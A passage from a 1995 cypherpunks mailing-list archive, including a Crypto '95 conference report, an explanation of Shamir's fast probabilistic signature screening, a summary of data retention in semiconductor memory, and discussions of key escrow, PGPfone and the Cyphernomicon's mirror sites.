the latter can't exist then it follows that the master key versions can't exist either. Bruce Schneier gave a talk summarizing the sketchy information known about Skipjack (the cipher in Clipper), including some FOIA'd docs. These included some comments from design reviews by Mycotronix on earlier versions, which included references to F and G boxes or tables. This is the first I had heard of this and helps explain why people thought S-1 was Skipjack or a hoax, since it had F and G tables. (I hadn't felt that the number of rounds and key/block sizes were sufficient coincidence to preclude independent invention.) A new crypto library was announced from AT&T. It is written in C and has a bignum lib (arbitrary size) and the usual crypto suspects, although I think not RSA presuambly due to patent issues. On a reasonably modern PC it could do an RSA 1024 bit signature in 900 milliseconds. Email to lacy at research.att.com with subject CRYPTOLIB to be informed on when it will be released and how to get it. Dhem and Quisquiter described CASCADE, a smart card system with voice recognition for ID rather than the PIN usually used. http://www.dice.ucl.ac.be/~dhem/cascade/. This talk was hard to understand due to the language differences. Eric Hughes, co-founder of the cypherpunks, announced the formation of Cypherpunk Laboratories, a California non-profit corporation. It is intended to be a common resource for people motivated by freely available strong cryptography tools. Among other things it will offer scholarships and prizes to students who create relevant work and papers, consider establishing an online journal focusing on implementations of crypto, and work on software development. One project Eric mentioned was to create a replacement for PGP. Ron Rivest proposed probabilisitic key escrow, which he described as "translucent" crypto. The idea is that with every message you send there is a Law Enforcement Access Field, but there is only some probability p that it is readable, and you can't tell if it will be readable or not. This way you don't lose as much privacy but criminals can't take the risk that maybe they'll be unlucky and this particular message will be readable. Shamir had an interesting paper on preventing "flooding" attacks. A server may check for signatures on incoming messages to reject bogus ones (only certain sigs are valid) but just doing a signature check may take too long if it is really being flooded. Shamir came up with a kind of signature which can be quickly probabilistically checked, based on a variation on the Rabin cryptosystem. You can do almost all the work using single precision and it should be very fast. I will write this up if anyone is interested. Our own Wei Dai, at 19 the youngest author, has spent his summer vacation developing with Josh Benaloh at Microsoft an improved modular reduction algorithm, which unfortunately will be patented (or at least they will try). BTW a number of people from Microsoft were in attendance at Crypto, including other list members. Obviously this crypto stuff is considered very important at MS. One of the more interesting talks I thought was from cypherpunk Doug Barnes, on "identity agnostic" electronic cash. This is basically an idea for creating a Magic-Money-type electronic cash server without violating Chaum's cash patent. What you do is to run the server and publish a spec it will follow. All the server does is do an RSA signature on the raw data it receives and decrement the user's account accordingly. The user has a choice of doing blinding or not on the signature. Chaum's patent covers the blinding, so if the user wants to do that he should be sure to license the patent or live somewhere it doesn't apply (or ignore it if he figures he's too small potatoes for them to care about). But the server isn't responsible for checking all this. It just does RSA sigs, which is prior art as far as Chaum's patent goes. Users can blind or not, it doesn't care. It is "identity agnostic" as Doug says. The implication is that with an RSA license you could run this kind of bank (online cash) and ignore Chaum's patents, while a horde of end users violate the patents but take safety in numbers and get anonymity. Lawyers like to go after big targets but the servers aren't violating anything. The other things I enjoyed in the conference were the non technical talks by Bob Morris (senior), retired NSA, and later Adi Shamir. Morris said, with what I thought was peculiar emphasis, "never underestimate the amount of time, money, and effort your opponent will put into breaking your encryption." He was supposedly speaking in the context of the German (and Allied) mistakes during WWII, but I got the impression he was talking about today, and in fact warning of NSA efforts to spy on people. He went on to describe the many ways mikes and antennas can be planted or used - he looks at a telephone and sees a microphone, and the hand cord is an antenna. All in all a rather chilling talk from someone who obviously can't say as much as he would like to. Shamir had some interesting anecdotes about the invention of RSA. He emphasized what amateurs the three of them were, claiming this was probably an advantage. Some of the other talks I enjoyed without following all the details were the cryptanalysis ones. A lot of systems were broken or weaknesses found. Most were not ones I was familiar with but it just emphasizes how hard it is to really come up with something strong. All those bozos on sci.crypt with their "break this" challenges would benefit from seeing some of these results. All in all there were several interesting results even if the percentage seemed smaller than usual. Hal Finney From mfroomki at umiami.ir.miami.edu Sat Sep 2 14:07:04 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Sat, 2 Sep 95 14:07:04 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com> Message-ID: On Sat, 2 Sep 1995, Perry E. Metzger cleverly sought to get legal advice from me by writing:: > > Michael, you are one of our local lawyers. Could you please confirm > the length of the statute of limitations? > harumphf. (1) I'm not "local" -- as I plan to argue in my cameo at the next Sun User's Group confernece "cyberspace is not a jurisdiction" [apologies if you meant local == USA]; (2) as it happens, I'm nowhere near my law books at the moment, being telnetted from abut 1800 miles (I'd guess) away....so I'm unable to oblige right now. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki From mixmaster at obscura.com Sat Sep 2 14:38:32 1995 From: mixmaster at obscura.com (Mixmaster) Date: Sat, 2 Sep 95 14:38:32 PDT Subject: Nautilus 1.0 under OS/2 Warp? Message-ID: <199509022131.OAA04066@obscura.com> Has anyone run the Nautilus 1.0 secure telecom software in a DOS box under OS/2? When I've tried it, it starts up, audio saying "welcome to Nautilus" comes out of my speakers, and I'm prompted for a passphrase. The problem comes when it tries to connect to the modem. It comes back and says "Remote failed to connect" followed by "Resetting modem...". Then the software exits. It never even takes the phone line off the hook. Other DOS comm software works just fine in a DOS box, so why not Nautilus? From anon-remailer at utopia.hacktic.nl Sat Sep 2 14:45:23 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Sat, 2 Sep 95 14:45:23 PDT Subject: anyone know what this "top secret" code does?Re: anyone know what this "top secret" code does? In-Reply-To: <40odtn$1md@teal.csn.net> Message-ID: <199509022145.XAA02299@utopia.hacktic.nl> hallam at zorch.w3.org (Phillip M. Hallam-Baker) wrote: > The code looks more than a casual hoax. Its not Skipjack, but that > does not mean its not NSA originated. Its probable that many of the > people who designed skipjack don't know its skipjack. If you read > the code carefully it is obvious why its not skipjack, an S2 > algorithm is referenced explicitly. [...] > Regardless about whether or not it is skipjack it challenges one of > the basic assumptions of many cipher designers, namely that the > amount of diffussion should be maximized at each round. I am now > very much less than convinced that this is in fact an issue. The S1 > design with its narrow diffussion provides very strong guarantees > that one round cannot undo the work of the previous one. > S1 must therefore be considered to be a significant contribution to > the cryptographic community. It has challenged a fundamental tenet of > faith which has so far been accepted without argument. It is thus > paradigmatic in that it may lead to a new method of cipher design. Does anyone remember the scenario someone suggested awhile back that hypothesized a scheme by the NSA or other TLAs to encourage the use of WEAK crypto? It involved spreading a lot of F.U.D. about PGP and other strong crypto methods, followed by the discovery/leak of a supposedly "strong" crypto algorithm to replace it. This may not be it. It may just be a trial balloon to gauge the reaction of the crypto community to an anonymous, "gift from heaven" crypto algorithm. But at least be aware of what COULD happen. One tactic that might be tried is an intentional "leak", followed by a flurry of legal actions designed to make it look like the "leak" was going to cause some real damage to their cryptanalysis efforts, due to it being "unbreakable", or whatever. Of course, anything "leaked" would be crippled in some undetectable manner so as to provide a back door... From rrothenb at ic.sunysb.edu Sat Sep 2 15:45:05 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Sat, 2 Sep 95 15:45:05 PDT Subject: VoicePGP Query Message-ID: <199509022244.SAA24545@csws5.ic.sunysb.edu> Due to some acct. problems I lost most of the mail snet to me betw. May and September. I saw a post in a newsgroup about VoicePGP betas being available, though only for Mac and WIn'95... is this true? And if so, will there be a Win 3.11 or OS/2 or DOS version out eventually? I don't intend to get Win '95 for as long as I can avoid it (and this is NOT the start of an OS flame war...) Also, what's the status of PGP 3.0? Thanks, Rob From terrell at sam.neosoft.com Sat Sep 2 15:51:31 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Sat, 2 Sep 95 15:51:31 PDT Subject: MIT distributing PGPfone -Reply Message-ID: <199509022301.SAA00324@sam.neosoft.com> >PGPfone was out of the U.S. less than 3 hours after first appearing >publically at the MIT site. > >As I noted in a previous message, MIT takes various steps to ostensibly >protect against export, but there is clearly no practical means of stopping >export once the software has been received by someone. > >I got my copy of PGPfone 16 hours after its public release, via an >anonymous person who posted it on the Cypherpunks list through an anonymous >remailer. Of course that list is distributed to more than 20 foreign >countries, so "export" happened that way, as well as by other means. > >--Tim May > As tim May's .sig should say: "National borders are not even speed bumps on the information highway." Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766 From hfinney at shell.portal.com Sat Sep 2 17:17:59 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 2 Sep 95 17:17:59 PDT Subject: PGPfone over Appletalk Message-ID: <199509030016.RAA03752@jobe.shell.portal.com> From: "Rev. Mark Grant" > Can someone tell me how to run PGPfone over Appletalk ? The > documentation says that support has been added for this release, and > there's a preferences box to check to use it, but there's no information > I can find in the documentation on how to initiate a call over > Appletalk.. it just says to enter a telephone number to dial. If I > press 'Connect' without entering anything it hangs up the Mac. > > How do I tell it which machine I want to connect to ? I changed the preferences box setting, but then I exited and restarted the program so that it came up in "appletalk" mode. This is probably the step you are missing. I did this on two different machines, and then when I clicked connect it no longer tried to open the modem, instead it put up a dialog box allowing me to click on the machine running the other PGPfone. I did that and it connected OK. There is a nice audio simulation of an old-fashioned telephone bell ringing. Unfortunately my appletalk "network" consists solely of my power mac and an old 68030 mac laptop, the latter apparently being underpowered for PGPfone. The voice quality changed occasionally as the software adaptively tried different coders, and the powermac instance of the program finally printed a message saying that the list of coders had been exhausted. Hal From hfinney at shell.portal.com Sat Sep 2 18:14:53 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 2 Sep 95 18:14:53 PDT Subject: Quickly checking signatures Message-ID: <199509030113.SAA19877@jobe.shell.portal.com> Let me describe Shamir's method for quickly doing a probabilistic signature check. Since this was a rump session paper he didn't have it written up. Shamir uses a variation of the Rabin system. The Rabin encryption system is similar to RSA, but instead of exponents which are relatively prime to the predecessors of the factors of the modulus, the exponent used is 2. This requires somewhat different techniques. A message M is encrypted by doing M^2 mod n. The decryption is then done by taking the modular square root. There are a few technical hitches that occur here but nothing major. Similarly a message M is signed by calculating its modular square root S such that S^2 = M mod n. Note that with Rabin you can't just sign any arbitrary number as that may allow the factors to be revealed. However this is not a major problem because practical systems in use today sign specially padded hashes, not arbitrary numbers. Now Shamir uses a slight modification to this. Normally we have: S^2 = M mod n This can be written as: S^2 = M + C*n for some C, which is simply the definition of modular equality. Now, what he suggests is that instead of sending S as the signature of M, you send C. This is justified on 3 grounds: - C is the same size as S - C has the same security as S (knowing M and n you can derive C from S and vice versa) _ C and S are equally easy to generate However, by sending C as the signature of a message M it allows a fast screening to be done. The idea is that the message should be accepted if M+C*n is a perfect square (because then S can be derived as the normal square root - that is how you get S from C as mentioned above). And this is something that can be checked quickly. In number theory there is a notion of a "quadratic residue" modulo some number. If a number is a quadratic residue that simply means that it has a square root, that it is the square of some other number using the modulus. With a prime modulus half of the numbers are quadratic residues and half are not. For example, with modulus 7 the q.r.'s are 1, 2 and 4 and the non q.r.'s are 3, 5, and 6. It turns out that testing whether a number x is a quadratic residue modulo a prime p can be done by calculating x^((p-1)/2) mod p. This will be 1 if and only if x is a q.r. Now, the key idea is this: if a number is a perfect square then the result of taking that number modulo a prime must be a quadratic residue. This means that we can quickly determine that C is a perfect square by checking whether C mod p for various random small primes p is a quadratic residue. By picking p to be a single precision prime of say 16 bits, the q.r. calculation can all be done without using multiple precision arithmetic and so it will be very fast compared to actually checking a signature. So, the procedure for the check is as follows: given n, M and C, choose a small prime p and calculate M+C*n mod p. Then raise this to the (p-1)/2 power mod p and see if the answer is 1. If it is, we give a "provisional" acceptance to the signature. If it is not, we reject the signature; it cannot be valid. This test may be repeated a few times with different values of p to improve the rejection of bad signatures. Once we have taken the input numbers mod p the rest of the arithmetic can be done with ordinary single precision integer variables. (One thing I overlooked is the possibility that M+C*n will be a multiple of p. In that case M+C*n mod p will be 0 and this is a provisional pass.) Of course checking the signature the old-fashioned way just takes a single multi precision multiplication, which won't be all that slow. So this puts a limit on the number of p's you can check this fast way before it becomes slower. Also, you'd have to choose the primes at random as otherwise an attacker who knew your p's could conjure up a C which would produce a quadratic residue for some small number of known p's. Hal From pgut01 at cs.auckland.ac.nz Sat Sep 2 11:26:03 1995 From: pgut01 at cs.auckland.ac.nz (Peter Gutmann) Date: 2 Sep 1995 18:26:03 GMT Subject: SUMMARY: Not-so-volatile volatile memory Message-ID: <42a7jr$1me@net.auckland.ac.nz> About a month ago, I asked for comments about recovering data from semiconductor memory after power had been removed. After much procrastinating, I've finally finished the summary of what people sent me. Many thanks to everyone who responded, in particular to Bob Hale for answering many questions about the possibility of recovering data from DRAM's. If anyone has any further comments to add to this (I'm particularly interested in actual figures for data retention in DRAM cells, although I've been told this is burn-before-reading proprietary information), you can send it to me at the above address. Peter. -- Summary: Data retention in semiconductor memory -- Contrary to conventional wisdom, "volatile" semiconductor memory does not entirely lose its contents when power is removed. Both static (SRAM) and dynamic (DRAM) memory retain some information on the data stored in it while power was still applied. SRAM is particularly susceptible to this problem, as storing the same data in it over a long period of time has the effect of altering the preferred power-up state to the state which was stored when power was removed. Older SRAM chips could often "remember" the previously held state for several days. In fact, it is possible to manufacture SRAM's which always have a certain state on power-up, but which can be overwritten later on - a kind of "writeable ROM". DRAM can also "remember" the last stored state, but in a slightly different way. It isn't so much that the charge (in the sense of a voltage appearing across a capacitance) is retained by the RAM cells, but that the thin oxide which forms the storage capacitor dielectric is highly stressed by the applied field, or is not stressed by the field, so that the properties of the oxide change slightly depending on the state of the data. One thing that can cause a threshold shift in the RAM cells is ionic contamination of the cell(s) of interest, although such contamination is rarer now than it used to be, because robotic handling of the materials and the purity of chemicals is greatly improved. However, even a perfect oxide is subject to having its properties changed by an applied field. When it comes to contaminants, sodium is the most common offender - it is found virtually everywhere, and is a fairly small (and therefore mobile) atom with a positive charge. In the presence of an electric field, it migrates towards the negative pole with a velocity which depends on temperature, concentration of the sodium, the oxide quality, and the other impurities in the oxide such as dopants from the processing. If the electric field is zero and, given enough time, the sodium contamination tends to spread itself around evenly. Other factors which affect the rate of change are temperature, the field strength of the stored charge, the quality of the oxide, and the concentration of dopants and other impurities which have already been mentioned above. The stress on the cell a cumulative effect, much like charging an RC circuit. If the data is applied for only a few milliseconds then there is very little "learning" of the cell, but if it is applied for hours then the cell will acquire a strong (relatively speaking) change in its threshold. The effects of the stress on the RAM cells can be measured using the built-in self test capabilities of the cells, which provide the the ability to impress a weak voltage on the storage cell in order to measure its margin. Cells will show different margins depending on how much oxide stress has been present. Many DRAM's have undocumented test modes which allow some normal I/O pin to become the power supply for the RAM core when the special mode is active. One way to activate the special test mode might be to underdrive a pin and turn on its protection diodes(s), which will be recognized internally and will change a multiplexer so that the core is powered by some pin which is normally a digital I/O pin. Another way, if the DRAM has suitable clocks, is to recognise an invalid combination of clocks (such as CAS before RAS, if the DRAM doesn't use that mode for higher speed operation) to enable the test mode. Great care must be taken to ensure that the test mode isn't inadvertently entered so that the memory system appears to be malfunctioning (for example in the first case if the system has substantial undershoot at the wrong time, the test mode could be activated). This problem can be avoided by designing the test mode signals such that a certain set of states which would not occur in a normally-functioning system has to be traversed to activate the mode. Manufacturers won't admit to such capabilities in their products because they don't want their customers using them and potentially rejecting devices which comply with their spec sheets, but have little margin beyond that. One way to speed up the annihilation of stored bits in semiconductor memory is to heat it. Both DRAM's and SRAM's will lose their contents a lot more quickly at Tjunction = 140C than they will at room temperature. Several hours at that temperature with no power applied will clear their contents sufficiently to make recovery difficult. Conversely, to extend the life of stored bits with the power removed, drop the temperature below -60C (some people even claim that you can permanently "imprint" an SRAM with its stored bits by rapidly cooling it below liquid nitrogen's boiling point). In any case it should lead to weeks, instead of hours or days, of data "retention". Simply repeatedly overwriting the data held in DRAM with new data isn't nearly as effective as it is for magnetic media. The new data will begin stressing or relaxing the oxide as soon as it is written, and the oxide will immediately begin to take a "set" which will either reinforce the previous "set" or will weaken it. The greater the amount of time that new data has existed in the cell, the more the old stress is "diluted", and the less reliable the information extraction will be. Generally, the rates of change due to stress and relaxation are in the same order of magnitude. Thus, a few microseconds of storing the opposite data to the currently stored value will have little effect on the oxide. Ideally, the oxide should be exposed to as much stress at the highest feasible temperature and for as long as possible to get the greatest "erasure" of the data. Unfortunately if carried too far this has a rather detrimental effect on the life expectancy of the RAM. Therefore the goal to aim for when sanitising memory is to store the data for as long as possible rather than trying to change it as often as possible. Conversely, storing the data for as short a time as possible will reduce the chances of it being "remembered" by the cell. Based on tests on DRAM cells, a storage time of one second causes such a small change in threshold that it probably isn't detectable. On the other hand, one minute probably is detectable, and 10 minutes is certainly detectable. The most practical solution to the problem of DRAM data retention is therefore to constantly flip the bits in memory to ensure that a memory cell never holds a charge long enough for it to be "remembered". While not practical for general use, it is possible to do this for small amounts of data such as encryption keys. From adept at minerva.cis.yale.edu Sat Sep 2 18:32:55 1995 From: adept at minerva.cis.yale.edu (Ben) Date: Sat, 2 Sep 95 18:32:55 PDT Subject: Basic Public key algorithms. In-Reply-To: <199509021813.OAA29335@frankenstein.piermont.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 2 Sep 1995, Perry E. Metzger wrote: > > Daniel R. Oelke writes: > > I could use RSA (which is well described in many sources, and has > > RSAREF out there), but I want to avoid the patent issue if possible. > > The sci.crypt FAQ mentions that there are other methods but that > > is about all it says. Are there any that are not patented? > > No, because one patent covers public key cryptography itself, and not > a particular method. Point of information--I'm not flaming you Perry, but Public Key Partners claims that their patent covers all forms of Public Key Crypto. Phoeeey. Ben. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMEjwWb5ALmeTVXAJAQGW2wL/RAfqyRrNoUeYDBkQKSsDhasM/xGSF3R/ JHvJyaFHr04Z+8KydRXxt+fU54JH01webbiol1EmH9ZvOdc175VRVBSg5+EiykzM 1bdW6dZXejeHHVelI343mOv0+Y0fDeiT =FPqc -----END PGP SIGNATURE----- From samman-ben at CS.YALE.EDU Sat Sep 2 18:58:20 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Sat, 2 Sep 95 18:58:20 PDT Subject: Basic Public key algorithms. In-Reply-To: <199509030031.UAA29612@frankenstein.piermont.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 2 Sep 1995, Perry E. Metzger wrote: > > > No, because one patent covers public key cryptography itself, and not > > > a particular method. > > > > Point of information--I'm not flaming you Perry, but Public Key Partners > > claims that their patent covers all forms of Public Key Crypto. > > How is this at all different from what I just said? It isn't. I just misread what you wrote. Mea culpa. Ben. ____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf PGP encrypted mail welcomed--finger samman at cs.yale.edu for public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3 iQB1AwUBMEkLmL5ALmeTVXAJAQHotAL/bW9tN3Lf+9ATx8ks0s8kz8O3zTikverx y9bJfsQRaoDtJkNmeiFPBSCIl9q27OIdpN4tyExmFztJVgEdxRYcqZ19ZcXVDRpI B//GwQQ45JXl1ZKurT0cr2poIecCAFuE =/0J/ -----END PGP SIGNATURE----- From edge at got.net Sat Sep 2 19:41:49 1995 From: edge at got.net (Jay Campbell) Date: Sat, 2 Sep 95 19:41:49 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations In-Reply-To: Message-ID: On 2 Sep 1995, Dar Scott wrote: > >I finished my first release, a megabyte-sized file done in MORE, a powerful > >outline processor (which enabled me to maintain notes, make > >cross-references, and generally manage such a huge writing project). I > >released it last year, and put it in my anonymous ftp account at > >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom > >is often very crowded, though. > > After several tries I was not able to get this. Has anyone made it > available in an alternate location? Tim mentioned that we're planning on spiffing up the cypherpunks web site (including using a real web server) and the cyphernomicon is an obvious candidate for inclusion - depending on how many people help out, the new site (a quasi-mirror at first, till we get sameer/et al's go-ahead) should be live within a couple weeks. If you're interested in gathering documents, hacking HTML, or anything else involved in creating/maintaining a web hierarchy, drop me a line. The space/delivery of the documents we're providing for free, but I don't have a budget to hire a staff to do things the "right way" (my way :) for this project. -- Jay Campbell - Regional Operations Manager -=-=-=-=-=-=- Sense Networking (Santa Cruz Node) edge at you.got.net "Shoot the Fruit Loop" 408.469.9400 From monty.harder at famend.com Sat Sep 2 20:43:40 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sat, 2 Sep 95 20:43:40 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... Message-ID: <8B05513.00030003DB.uuout@famend.com> BS> For the problem that started this discussion, though, there's no good solution. BS> Since the Bad Guys _can_ encrypt a message to you with your signature key, BS> and send it to you by anonymous remailer, they can plant a reason to suspect BS> that you may have evidence encrypted with that key. You've got it backwards. The problem that I originally posited was a corrupt key escrow agent using my signature key to forge a document. The fact that my signature pubkey could be used to encrypt messages to me is not particularly relevant. My employer could set up filters to keep me from recieving email on company time that is not encrypted to a key that the corporate escrow authority has in its possession. NBD. My concern here is with the NGACK situation. Companies have valid reasons to want escrow for their own purposes. I'm just warning people not to accept a signature key being escrowed by =anyone=. When you create a key to be escrowed, make sure the userid includes something like [Not Valid For Signatures]. * Pro Choice on Abortion. * No choice on Education. * Huh? --- * Monster at FAmend.Com * From monty.harder at famend.com Sat Sep 2 20:43:42 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sat, 2 Sep 95 20:43:42 PDT Subject: A problem with anonymity Message-ID: <8B05513.00030003DC.uuout@famend.com> TC> Oh, I agree, of course. Except that the escrow agent need not be a TC> "nonymous" agent, to use Monty's terminology here. Sorry, my Greek is rusty. Shoulda been "onymous", I suppose. But if the escrow agent is anonymous, we simply recurse, moving now to the question of whether anyone can trust the Anonymous Escrow Agency not to take the money and run. TC> (I mention banks because, when you look at it closely, today's banks can TC> quite easily claim that a customer made a withdrawal when he didn't. That TC> they don't says more about the nature of persistent businesses than about TC> any government oversight or security features. This is a side point, but it TC> bears keeping in mind that the real world of banks and businesses, etc., is TC> not fully secure, either. And yet it mostly works pretty well. The reasons TC> for this are interesting to consider.) A bank has $$ invested in impressive-looking buildings, (so that vanishing into the ether and setting up shop elsewhere is rather difficult) and several officers whose TrueNames are registered with the appropriate agencies, so that they may be sued if they pull this crap. While individual stockholders might appreciate the anonymity (and protection from legal action) of owning stock in a bank or escrow agency (might just combine the functions, while we're at it), they demand onymity of the officers with whom they entrust the keys to the corporation. * --- * Monster at FAmend.Com * From tcmay at got.net Sat Sep 2 20:58:25 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Sep 95 20:58:25 PDT Subject: A problem with anonymity Message-ID: At 2:38 AM 9/3/95, MONTY HARDER wrote: > But if the escrow agent is anonymous, we simply recurse, moving now to >the question of whether anyone can trust the Anonymous Escrow Agency not >to take the money and run. Well, at one level, everything is always recursive. But seriously, the reason it differs is that the escrow agents are in the business to be escrow agents, not to take the money and run. This actually works in the real world. (Game-theoretically, they get a certain payoff in defecting, but then forego the revenue stream from future transactions....) And, of course, it is possible to structure things so that the escrow agent cannot "take the money and run," because the money is not accessible to them. This is analogous to an escrow agent in the real world holding a check from Alice to Bob until Bob completes some set of conditions. The escrow agent--call her Essie--cannot cash the check herself. She can of course renege on the deal, even if Bob does his part of the bargain, but there is little incentive for her to do so. One can ask what payoffs and costs/benefits exist for various actions by these agents, and game theory needs to take a look at these sorts of transactions, but there are plenty of reasons to believe "convergence" will occur (basically, that "effectively honest" behavior will be common). >TC> (I mention banks because, when you look at it closely, today's banks can >TC> quite easily claim that a customer made a withdrawal when he didn't. That >TC> they don't says more about the nature of persistent businesses than about >TC> any government oversight or security features. This is a side point, but it >TC> bears keeping in mind that the real world of banks and businesses, etc., is >TC> not fully secure, either. And yet it mostly works pretty well. The reasons >TC> for this are interesting to consider.) > > A bank has $$ invested in impressive-looking buildings, (so that >vanishing into the ether and setting up shop elsewhere is rather >difficult) and several officers whose TrueNames are registered with the >appropriate agencies, so that they may be sued if they pull this >crap. No, my point was that it is fairly easy for any bank to scam any particular customer, given the flaky nature of verification of withdrawals and other transactions (at least for smallish amounts of money). Few banks check signatures, few banks bother to demand much ID, etc. The issue is not whether you can sue Bank of America, but whether you could win. That banks don't often scam customers for small amounts of money is testimony to the fact that they've got a better payoff matrix element in being a bank than the meager payoff in scamming a few customers. I submit this not as proof, but as evidence that the type of "convergence" mentioned above mostly works. Most commerce hinges on this, not because of law enforcement. Like True Names, the threat of law enforcement is only a part of the overall equation. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jim at acm.org Sat Sep 2 21:35:08 1995 From: jim at acm.org (Jim Gillogly) Date: Sat, 2 Sep 95 21:35:08 PDT Subject: Crypto '95: Robert Morris Message-ID: <199509030434.VAA24841@mycroft.rand.org> Bob Morris (recently retired from NSA) gave a fascinating invited lecture entitled "Non-cryptographic Ways of Losing Information". I hope he writes it up; until then, here are my notes from his presentation. Two things he said which I found new and fascinating: - During the early 1950's many major powers were discouraged by the tendency of then-modern crypto machines to fail in a way that would send plaintext instead of ciphertext, and they went to one time pads for most of their high-level enciphered traffic. Because of key re-use, we were regularly and routinely reading pieces of that traffic -- not just VENONA, but many systems from various countries. Sometimes the people who prepared OTP's would double their profit by selling them to more than one customer. - By the middle to late 1960's cryptanalysis became less cost effective than obtaining the information by other means -- wiretaps and so on. Morris emphasized and said we should write down these dicta: ------------------------------------------------------------------------- Never underestimate the attention, risk, money and time that an opponent will put into reading traffic. Rule 1 of cryptanalysis: check for plaintext. ------------------------------------------------------------------------- The real start of modern cryptology should be dated to the Enigma machines, which typified the new character of the art. Much has been made of the errors of the German cipher clerks, but egregious as they were, the errors made by the British cryptographers were vastly worse, and the American blunders were worse yet. German analysts regularly read and used Atlantic convoy orders throughout the war -- they were transmitted in an old code. One must always assume that the enemy has a copy of the machine/algorithm. A system that relies on keeping the algorithm secret is eventually doomed to failure, because it will always be discovered by some means or other. He sees microphones and antennas everywhere: the telephone line cord is an antenna; if telephone linemen were working on a pole outside his house he'd call the police an then find out what they were working on. In an unspecified country he called Lower Slobbovia (Al Capp, isn't it?) American troops used encrypted radiophones; when they broke they were taken to local repair shops to be fixed. When they got home the US engineers were interested to see the modifications that had been made. He mentioned a few similar instances, including the lovely carved wooden seal given to the US Embassy in Moscow to decorate their anteroom. [It's now on view at the National Cryptologic Museum with the transmitter cavity visible.] Cordless phones have a range of 5 miles or so. Use of cellular phones is increasing dramatically, as well as fax and modems. He discussed the Walker/Whitworth spying case, and said one of his design criteria is to design systems with Walker in them: it's not good enough to have a system where everyone must be trusted, but it must also be made robust against insiders. This may include going to non-paper systems, so that there are no paper keys that the Walkers of the world can shop to the other side. Threats and risks include: overconfidence, carelessness, eavesdropping and tapping, theft of floppies and other materials, purchase, theft of key material, burglary and blackmail. Much or most loss is due to insiders. In the future there will be more radio used for ordinary communications. Americans are unwilling to pay for secure telephones, but that's not the case in Europe. ------------------------------------------------------------------------- Reported by: Jim Gillogly 12 Halimath S.R. 1995, 04:33 From dsc at swcp.com Sat Sep 2 22:00:36 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 2 Sep 95 22:00:36 PDT Subject: Cyphernomicon Message-ID: Thanks to all who helped me get my hands on Cyphernomicon. I now can breeze through the html site at www.oberlin.edu. I guess at 2am it didn't work because either I or oberlin were too sleepy. I still cannot open an FTP port at netcom. I got a copy on my Mac by giving a lot of memory to Netscape and getting it from www.swiss.ai.mit.edu. I also got a copy from Jeff's zipped copy at ftp.goblin.punk.net, but my unzipping utility hacked out a few lines. Here is a summary of what I learned: Cyphernomicon File Size: 1,287,731 (single character newlines) FTP sites: ftp.netcom.com/pub/tc/tcmay/CP-FAQ The original. "crowded" (I couldn't open an FTP port.) ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz ftp.goblin.punk.net/pub/docs/cypherfq.zip 28.8 bps modem, newline=CR, but .zip will change to newline=CRLF About 432Kbytes. (On PPP at 14.4 it took me 6+ minutes to get it.) "until someone posts it on a site with higher bandwidth" [the upcoming new/changed/mirrored Cypherpunk site] HTML site: http://www.oberlin.edu/~brchkind/cyphernomicon/ nice. Other http: sites: http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ text. very responsive and fast (6 minutes for my 14.4 connection). http:/www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ text http://www.msen.com/~lwp/Cyphernomicon.gz About 432Kbytes. Need g[un]zip utility. Clearly missing are credits and contact info. I probably won't get to the FAQ much this weekend (wife & kids expect me to do my share and bring home the bacon), but maybe in a week or two. Do I have to read the sci.crypt FAQ, too, to earn my FAQ badge? Dar (list newbie) =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 <--- 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html My preference for attached files are in this order: AOL, Mime, Binhex4, PGP, UUencode =========================================================== From lwp at mail.msen.com Sat Sep 2 22:06:01 1995 From: lwp at mail.msen.com (Lou Poppler) Date: Sat, 2 Sep 95 22:06:01 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations In-Reply-To: Message-ID: Also available at http://www.msen.com/~lwp/Cyphernomicon.gz On Fri, 1 Sep 1995, Timothy C. May wrote: > released it last 